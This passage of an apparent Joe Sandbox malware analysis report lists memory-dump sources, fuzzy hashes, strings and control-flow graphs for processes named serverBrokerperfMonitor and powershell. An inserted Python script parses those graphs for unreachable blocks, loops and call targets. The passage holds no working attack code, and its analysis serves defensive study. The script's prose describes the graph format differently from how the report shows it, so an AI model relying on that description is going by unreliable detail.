                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 2962429428-0
                                                                                                  • Opcode ID: 87436add337fecb39f3e0ea8ef896b41bd8c97f80bbb157a94eb0188c52a61ef
                                                                                                  • Instruction ID: 6de1a4cf150e89ed5438663bbc8a9106a0f4d9ecb3909e39686bd911d5405652
                                                                                                  • Opcode Fuzzy Hash: 87436add337fecb39f3e0ea8ef896b41bd8c97f80bbb157a94eb0188c52a61ef
                                                                                                  • Instruction Fuzzy Hash: 6E414A70E0864C8FDB59DFA8C894BEDBBF0FB56310F1441AAD049E7292DA74A885CB41

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5f1eac5d810eede91ed5ff7e4e3e17f82bd1bbd59b775eb3dec48cc96494ff8a
                                                                                                  • Instruction ID: b89c21ceeb2fed208a7d397299c15897c463999783cfab1bf160a25ff2b7ea6a
                                                                                                  • Opcode Fuzzy Hash: 5f1eac5d810eede91ed5ff7e4e3e17f82bd1bbd59b775eb3dec48cc96494ff8a
                                                                                                  • Instruction Fuzzy Hash: 6D51BF31B1855D8FEB54FFA8D495AEC7BE0FF58314F0105BAD00ED7196DA35A8818B80

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5dd9ce702684b488146e6c69aca35246c0db87672a84b6b2dd4ac7d14d958322
                                                                                                  • Instruction ID: a8d9fcfb6fcc112d5c341975a90fc59f7da4456f4ea9dd04a46850b6df65d8d4
                                                                                                  • Opcode Fuzzy Hash: 5dd9ce702684b488146e6c69aca35246c0db87672a84b6b2dd4ac7d14d958322
                                                                                                  • Instruction Fuzzy Hash: 8B51E371A0850E9FCF84EF68D894EED7BF1FF58355B050265E409E72A1CA34E990CB80

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 451a724e94549007b69eced40b994585848bd83dfab1fc482514ec114b272307
                                                                                                  • Instruction ID: 64ae2827f82059cdfecfd14c3e7af1390045ec7dd37cb085a80e986ec0b8a3e2
                                                                                                  • Opcode Fuzzy Hash: 451a724e94549007b69eced40b994585848bd83dfab1fc482514ec114b272307
                                                                                                  • Instruction Fuzzy Hash: 18412830E1491D9FDF94EFA8C495AEDBBF1FF68715F10017AE409E32A5DA34A9418B80

                                                                                                  Control-flow Graph
                                                                                                  • Basic blocks (node: address range): 160: 7ffd9bc3160d-7ffd9bc3160e; 161: 7ffd9bc31610-7ffd9bc3162b; 162: 7ffd9bc3168d-7ffd9bc31694; 163: 7ffd9bc3162d; 164: 7ffd9bc31632-7ffd9bc3164d; 165: 7ffd9bc3169e-7ffd9bc3178b
                                                                                                  • Edges: 160->161, 160->162, 161->163, 161->164, 162->165, 163->164, 164->162
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1966015794.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bc30000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3eea52484bcd4c12570162b3ed22d64f160adb2d687003ab62c168ab7f9d8259
                                                                                                  • Instruction ID: 358499788216530113703ea77e24cc2833fd83f8ab92efa318d05a01b2ec8610
                                                                                                  • Opcode Fuzzy Hash: 3eea52484bcd4c12570162b3ed22d64f160adb2d687003ab62c168ab7f9d8259
                                                                                                  • Instruction Fuzzy Hash: F841B271A18A4A8FDB54EB58C8A1EA8B7F2FF58309F4501F9D40DD3292DB34A981CB41

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 890d185046cbf8eaeb84a3f6bcce5b4d3dfaae1ff280616191eb269524f5d99e
                                                                                                  • Instruction ID: 106aae3647675ae781a22f03fc96811ed7024424e356991e1876a1138aece326
                                                                                                  • Opcode Fuzzy Hash: 890d185046cbf8eaeb84a3f6bcce5b4d3dfaae1ff280616191eb269524f5d99e
                                                                                                  • Instruction Fuzzy Hash: D8419470A1952D8FEBB5EB54C858BA8B7F5FB58701F0141EAD04DE22A1DA746BC4CF00

                                                                                                  Control-flow Graph
                                                                                                  • Basic blocks (node: address range): 211: 7ffd9bc31659-7ffd9bc31693; 216: 7ffd9bc3169e-7ffd9bc3178b
                                                                                                  • Edges: 211->216
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1966015794.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bc30000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ae406be6af1adf3db48511c04374e440d63c529e1751e7a8beedee97de2bed4d
                                                                                                  • Instruction ID: 18f6480a342be1282b727a69017d9b1e72e5f1af7758acf2d0d4810990a634e1
                                                                                                  • Opcode Fuzzy Hash: ae406be6af1adf3db48511c04374e440d63c529e1751e7a8beedee97de2bed4d
                                                                                                  • Instruction Fuzzy Hash: F4318571A18A4A8FDB58EF588CB5DA4B7E2FB68305F4901FAD40DD3192DA35A9818F01

                                                                                                  Control-flow Graph
                                                                                                  • Basic blocks (node: address range, call targets in parentheses): 226: 7ffd9b9e0c25-7ffd9b9e0c41; 228: 7ffd9b9e0c7b-7ffd9b9e0c8f; 229: 7ffd9b9e0c43-7ffd9b9e0c77; 231: 7ffd9b9e0c96 (call 7ffd9b9e0960); 232: 7ffd9b9e0c91; 235: 7ffd9b9e0c9b-7ffd9b9e0ca8; 237: 7ffd9b9e0cab-7ffd9b9e0caf; 238: 7ffd9b9e0ccc-7ffd9b9e0d04 (call 7ffd9b9e07d0); 239: 7ffd9b9e0cb1-7ffd9b9e0cc8; 246: 7ffd9b9e0d06-7ffd9b9e0d0b; 241: 7ffd9b9e0cca
                                                                                                  • Edges: 226->228, 226->229, 228->231, 228->232, 229->228, 231->235, 232->231, 237->238, 237->239, 238->237, 238->246, 239->241, 241->241, 246->237
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 728293b3238415117c8281406b1eb36e56936e068ac899964f4e90b17f00537e
                                                                                                  • Instruction ID: 8ca68fc2b453e795bb7d2a9729fafe4903b5bcfb2d694868313dfd58d4f6e61d
                                                                                                  • Opcode Fuzzy Hash: 728293b3238415117c8281406b1eb36e56936e068ac899964f4e90b17f00537e
                                                                                                  • Instruction Fuzzy Hash: B3314531F0E24E9FE721ABA8C8622FD7BA0EF95710F050677D555A71E2CA782706C790
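Joe Sandbox emits each control-flow graph in this report as one whitespace-separated line of node definitions and edges, which is hard to read as text but easy to parse. The Python below is an added example, not Joe Sandbox's code: it parses that line form into basic blocks and edges and then answers the questions an analyst asks of such a graph, which blocks the entry never reaches, which edges are loops, and which addresses the function calls. The sample input is the graph for the function at 7ffd9b9e0c25 above, copied verbatim. The meaning of the tokens (a node id followed by an address or address range, `call <addr>` attached to the block just defined, `a->b` as an edge) and the choice of the first-defined block as the entry are inferences from the visible lines, not documented Joe Sandbox semantics.

```python
"""Parse Joe Sandbox's flattened control_flow_graph line into basic blocks and edges.
Added example, not Joe Sandbox code: the token grammar is inferred from this report,
"<id> <start>[-<end>]" defines a block, "call <addr>" records a call made in the block
just defined, "<a>-><b>" is an edge; the first block defined is taken as the entry."""
import re
from dataclasses import dataclass, field

# Constructed sample input: one graph line copied from this report section.
SAMPLE = (
    "control_flow_graph 226 7ffd9b9e0c25-7ffd9b9e0c41 228 7ffd9b9e0c7b-7ffd9b9e0c8f "
    "229 7ffd9b9e0c43-7ffd9b9e0c77 226->228 226->229 231 7ffd9b9e0c96 call 7ffd9b9e0960 "
    "232 7ffd9b9e0c91 228->231 228->232 229->228 235 7ffd9b9e0c9b-7ffd9b9e0ca8 231->235 "
    "232->231 237 7ffd9b9e0cab-7ffd9b9e0caf 238 7ffd9b9e0ccc-7ffd9b9e0d04 call 7ffd9b9e07d0 "
    "239 7ffd9b9e0cb1-7ffd9b9e0cc8 237->238 237->239 238->237 246 7ffd9b9e0d06-7ffd9b9e0d0b "
    "238->246 241 7ffd9b9e0cca 239->241 241->241 246->237"
)

RANGE_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$", re.IGNORECASE)
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")


@dataclass
class Block:
    node_id: int
    start: int    # first instruction address
    end: int      # last instruction address (== start for a single-address node)
    calls: list = field(default_factory=list)   # call targets made from this block


@dataclass
class Cfg:
    entry: int    # node id of the first block defined (assumed to be the entry)
    blocks: dict  # node_id -> Block, in definition order
    edges: list   # (src_id, dst_id)


def parse_cfg(text: str) -> Cfg:
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(toks):
        tok, nxt = toks[i], (toks[i + 1] if i + 1 < len(toks) else "")
        edge, rng = EDGE_RE.match(tok), RANGE_RE.match(nxt)
        if edge:                                             # "a->b"
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif tok.isdigit() and rng:                          # "<id> <start>[-<end>]"
            start = int(rng.group(1), 16)
            end = int(rng.group(2), 16) if rng.group(2) else start
            current = blocks[int(tok)] = Block(int(tok), start, end)
            i += 2
        elif tok == "call" and current is not None and rng:  # "call <addr>"
            current.calls.append(int(nxt, 16))
            i += 2
        else:
            raise ValueError(f"unexpected token {tok!r} at index {i}")
    if not blocks:
        raise ValueError("no basic blocks found")
    return Cfg(entry=next(iter(blocks)), blocks=blocks, edges=edges)


def successors(cfg: Cfg) -> dict:
    succ = {n: [] for n in cfg.blocks}
    for s, d in cfg.edges:
        succ.setdefault(s, []).append(d)
    return succ


def unreachable_blocks(cfg: Cfg) -> list:
    """Blocks no path from the entry reaches: handlers, dead code, or a merged routine."""
    succ, seen, stack = successors(cfg), set(), [cfg.entry]
    while stack:
        n = stack.pop()
        if n not in seen:
            seen.add(n)
            stack.extend(succ.get(n, []))
    return sorted(n for n in cfg.blocks if n not in seen)


def back_edges(cfg: Cfg) -> list:
    """Edges closing a cycle in a depth-first walk (the loops); the walk starts at the
    entry, then at every block the entry does not reach, in definition order."""
    succ, white, grey, black = successors(cfg), 0, 1, 2
    color, found = {n: white for n in cfg.blocks}, []

    def visit(n):
        color[n] = grey
        for d in succ.get(n, []):
            if color.get(d, white) == grey:
                found.append((n, d))
            elif color.get(d, white) == white:
                visit(d)
        color[n] = black

    for root in [cfg.entry, *cfg.blocks]:
        if color.get(root, white) == white:
            visit(root)
    return found


def call_targets(cfg: Cfg) -> list:
    return sorted({t for b in cfg.blocks.values() for t in b.calls})


if __name__ == "__main__":
    g = parse_cfg(SAMPLE)
    print(unreachable_blocks(g), back_edges(g), [hex(t) for t in call_targets(g)])
```

On the sample the part reachable from node 226 (228, 229, 231, 232, 235) is loop-free, while 237, 238, 239, 241 and 246 form a separate cluster with three back edges (238->237, 246->237 and the self-loop 241->241), so the two call sites, 7ffd9b9e0960 from block 231 and 7ffd9b9e07d0 from block 238, sit in different regions of the function. The same parser runs unchanged on the other graph lines in this report.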

                                                                                                  Control-flow Graph
                                                                                                  • Basic blocks (node: address range, call targets in parentheses): 247: 7ffd9b9e93d0-7ffd9b9e9444; 251: 7ffd9b9e944f-7ffd9b9e94a1; 252: 7ffd9b9e94aa-7ffd9b9e94db (call 7ffd9b9e0780); 255: 7ffd9b9e93a3-7ffd9b9e93aa; 256: 7ffd9b9e94e1-7ffd9b9e94eb; 257: 7ffd9b9e93ac-7ffd9b9e93c6; 258: 7ffd9b9e93ca-7ffd9b9e9500; 261: 7ffd9b9e9507-7ffd9b9e954b (call 7ffd9b9e0780); 262: 7ffd9b9e9502; 265: 7ffd9b9e9551-7ffd9b9e9559
                                                                                                  • Edges: 247->251, 251->252, 252->255, 252->256, 255->257, 255->258, 256->255, 257->247, 258->261, 258->262, 261->255, 261->265, 262->261, 265->255
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 64a697281f667d8dd519a6cdb8d010b0e7a4d44445638d9e4b8c574d61d69115
                                                                                                  • Instruction ID: 10329a5a5d6d3047f3d080bb8c1a549b05cb1534bbca0e10fa3a456528707a4a
                                                                                                  • Opcode Fuzzy Hash: 64a697281f667d8dd519a6cdb8d010b0e7a4d44445638d9e4b8c574d61d69115
                                                                                                  • Instruction Fuzzy Hash: 3F31837191491D9FDFA8EF18C855AE9B3F1FB68305F5081EAC04DE36A4CE716A848F81
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 73594df84dbf96538ef268b129267366d250e0b0b95306ce7f7f9a72feaa9a93
                                                                                                  • Instruction ID: b0988d74191e0b67bbb3c3354b194f86487f0147e80a092dec66677d0bf98add
                                                                                                  • Opcode Fuzzy Hash: 73594df84dbf96538ef268b129267366d250e0b0b95306ce7f7f9a72feaa9a93
                                                                                                  • Instruction Fuzzy Hash: 25216030A1491E9FEB94EFA8C8949EDB3F1FF68304B11057AD409D32A1DF35AA41CB40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cd70e8ccf2384f1cfa9a238e858d943dd511ae4ac48444b642e1e7d5d7b40566
                                                                                                  • Instruction ID: f7cc5f76b7e5a96b72f26192f93cdd05463481c696f824b81106a8b8a3a1d76b
                                                                                                  • Opcode Fuzzy Hash: cd70e8ccf2384f1cfa9a238e858d943dd511ae4ac48444b642e1e7d5d7b40566
                                                                                                  • Instruction Fuzzy Hash: 3E21A270A2952D8FDBBADB54C8657E8B7B5EB58701F0101FA904DA22A5CA786BC1CF00
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a8c25c8a463a9b3fc1c51276fdb7191c8a043fb5836e7d15ae044cf22af8c242
                                                                                                  • Instruction ID: 7872b65cb56a02f323556a7ac9d4b57c812b9129a6dd3feb47c4c515d76aeccc
                                                                                                  • Opcode Fuzzy Hash: a8c25c8a463a9b3fc1c51276fdb7191c8a043fb5836e7d15ae044cf22af8c242
                                                                                                  • Instruction Fuzzy Hash: 2B211D71E2A51D9FDB75DBA498657B873B4FF09300F1150FAD00DA22A1DA786B808F01
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: decf6940849478becf9360312a678dfe7de969841327484622e38cae355c7a07
                                                                                                  • Instruction ID: d0560865b9221b9dacbd2823f53326b3a207349a4870ca492ae28dde3981a62a
                                                                                                  • Opcode Fuzzy Hash: decf6940849478becf9360312a678dfe7de969841327484622e38cae355c7a07
                                                                                                  • Instruction Fuzzy Hash: 79112931B0D64E9EF712EBA8D8622E977A0EF91710F054637D595A71E2DA34230AC790
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 45792273204e4c3660aaf2e8698c71cef3b5aa6cc581c9ad1c2bbadf86af312b
                                                                                                  • Instruction ID: c34728d16ea6d92bb315c311e043d466418ce32834d7d2bdfc8978cf91b1eb2b
                                                                                                  • Opcode Fuzzy Hash: 45792273204e4c3660aaf2e8698c71cef3b5aa6cc581c9ad1c2bbadf86af312b
                                                                                                  • Instruction Fuzzy Hash: 26112B31F0D64E9FF712EBA4C8622E977A0EF51710F054676D595A71E2CA342309C790
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 20137a9f6a5dbe5c8b3d511cb0990968b43e1b4516daa7811d4684b12e2a5075
                                                                                                  • Instruction ID: 67e5dc96ff774be14aaea5cbed542f88d2c14fda088d8836877163c59c2f6709
                                                                                                  • Opcode Fuzzy Hash: 20137a9f6a5dbe5c8b3d511cb0990968b43e1b4516daa7811d4684b12e2a5075
                                                                                                  • Instruction Fuzzy Hash: 66115B3162824DDFCB44EF68C991AEA7BA0FF49318F1502AAF84DD7252C730E564CB81
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0953e1e2df1b917435dbf88a9b8015b9cdf1cbdca14ee7c95751f5df10928c78
                                                                                                  • Instruction ID: acde4c17da542b6c672b857a7ff305281930a1e6f7149609406f48275cd4c502
                                                                                                  • Opcode Fuzzy Hash: 0953e1e2df1b917435dbf88a9b8015b9cdf1cbdca14ee7c95751f5df10928c78
                                                                                                  • Instruction Fuzzy Hash: 9C01F531E0E64E8EE712ABA4C8512E977B0EF45710F054676D592AB2E2CA386709C780
                                                                                                  Memory Dump Source
                                                                                                  • Opcode Fuzzy Hash: 93d8dd8a8e168029d025fcbce4771eb00118dc56aa72fa4bd2e2012780a47c12
                                                                                                  • Instruction Fuzzy Hash: 3DF0243180868D8FDB06EF2888295D5BFA0EF27310F05029BE488C70B2DBA49558CB82
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3009745133.00007FFD9BA05000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA05000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9ba05000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b09d8db1cc1aa6bade495de96c6e867f506a63afb6e1decece3cb2ddb61410f3
                                                                                                  • Instruction ID: a8213db3735a37b08bb77fa90c8e434c17c9e433106aee2afc7ddd093a2a1148
                                                                                                  • Opcode Fuzzy Hash: b09d8db1cc1aa6bade495de96c6e867f506a63afb6e1decece3cb2ddb61410f3
                                                                                                  • Instruction Fuzzy Hash: B2E0CD2074D6894FD354965C94507B976C19F85310F54487DF4DD833D7C99C5D415353
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3009745133.00007FFD9BA05000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA05000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9ba05000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                                                                  • API String ID: 0-1500707516
                                                                                                  • Opcode ID: 615ba04035d24142b682f52b94d1645f05d7b2c927fd0fbea70c021a3e88cf23
                                                                                                  • Instruction ID: 481b3f85334ff1bb08ae2a37bc7a428d5540e389c1e6e94507e958443b483616
                                                                                                  • Opcode Fuzzy Hash: 615ba04035d24142b682f52b94d1645f05d7b2c927fd0fbea70c021a3e88cf23
                                                                                                  • Instruction Fuzzy Hash: 8D2137773044569EE30677ADB854DDC73C0CB9427638A47F3E169CB583ED1AA48B46C0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.3001397492.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9bad0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: K_H
                                                                                                  • API String ID: 0-313846638
                                                                                                  • Opcode ID: 6537fafa0e428154c140369e4f411b59d9c603046929e7d6abd45b238ced7c61
                                                                                                  • Instruction ID: d162646325aefe28ef988ee56dec947a92a60df74d4863314004d3bd36b63fc1
                                                                                                  • Opcode Fuzzy Hash: 6537fafa0e428154c140369e4f411b59d9c603046929e7d6abd45b238ced7c61
                                                                                                  • Instruction Fuzzy Hash: 3DA22722B0EBCA0FE766976848655B47BE1EF96210B0A02FFD09DC71F3DD58AD468341
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.2994619631.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9ba00000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: KL]
                                                                                                  • API String ID: 0-3031383875
                                                                                                  • Opcode ID: d6960f22c90cde837f5d442c6a02ce5af51362eca418acbb017b0840309b0e55
                                                                                                  • Instruction ID: 62c3abb5424153b1ea73f32e8e15ba6ef6a42e74ae6a75fda09d2d7ee97b29b9
                                                                                                  • Opcode Fuzzy Hash: d6960f22c90cde837f5d442c6a02ce5af51362eca418acbb017b0840309b0e55
                                                                                                  • Instruction Fuzzy Hash: B0F0E93190868C8FCB55DF5894285E47FE0FF2A200F0501E7D48DC7071D6649954C781
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.3001397492.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9bad0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf9a4e4030d82d8d33e2b7d434e835125472f07b0be5b49210e50e34d1be4bfe
                                                                                                  • Instruction ID: d54d1a1736595366fc31ee984023bb540202a6fee51ea170228c1cf5316ea7b2
                                                                                                  • Opcode Fuzzy Hash: bf9a4e4030d82d8d33e2b7d434e835125472f07b0be5b49210e50e34d1be4bfe
                                                                                                  • Instruction Fuzzy Hash: 27D14632B0FACE0FEB659BAC48655B97BE0EF96214B0902FED45DC70E3D958A905C341
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.2994619631.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9ba00000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 72cf9f63858767fe46eecce4e94173bd93a53a93881231d16549982969d6a2df
                                                                                                  • Instruction ID: 15c87b48930779d7f388e3f7130b91b63c2d2a8aa74612f7deb7dd919316f16a
                                                                                                  • Opcode Fuzzy Hash: 72cf9f63858767fe46eecce4e94173bd93a53a93881231d16549982969d6a2df
                                                                                                  • Instruction Fuzzy Hash: A2513512B0E6DB4FE713BB6CA8F54E93BA09F13214B4A41F3D8D98E0A7DD195C498361
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.2987812591.00007FFD9B8ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8ED000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9b8ed000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8451974441e6585079bbd7e9fa7046d0c894a38259155c3cb43fc252391f1a2a
                                                                                                  • Instruction ID: f37e75220193062fbc2e5b3e9536d389c1b6d95b73c0c4b714beb86e1e7c311b
                                                                                                  • Opcode Fuzzy Hash: 8451974441e6585079bbd7e9fa7046d0c894a38259155c3cb43fc252391f1a2a
                                                                                                  • Instruction Fuzzy Hash: EE41387050EBC44FE39ADB3C98519523FF0EF56221B0A05DFD088CB4A3D625A809C7A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.2994619631.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9ba00000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 484fb1c7392a23e46a30173f8b0252034762fb9bf44bd035b23e566bfcd7635a
                                                                                                  • Instruction ID: b4437ebce126f159722107b1a8dfd3cd1a07c4d9392513e6efa475cef0c5aaa9
                                                                                                  • Opcode Fuzzy Hash: 484fb1c7392a23e46a30173f8b0252034762fb9bf44bd035b23e566bfcd7635a
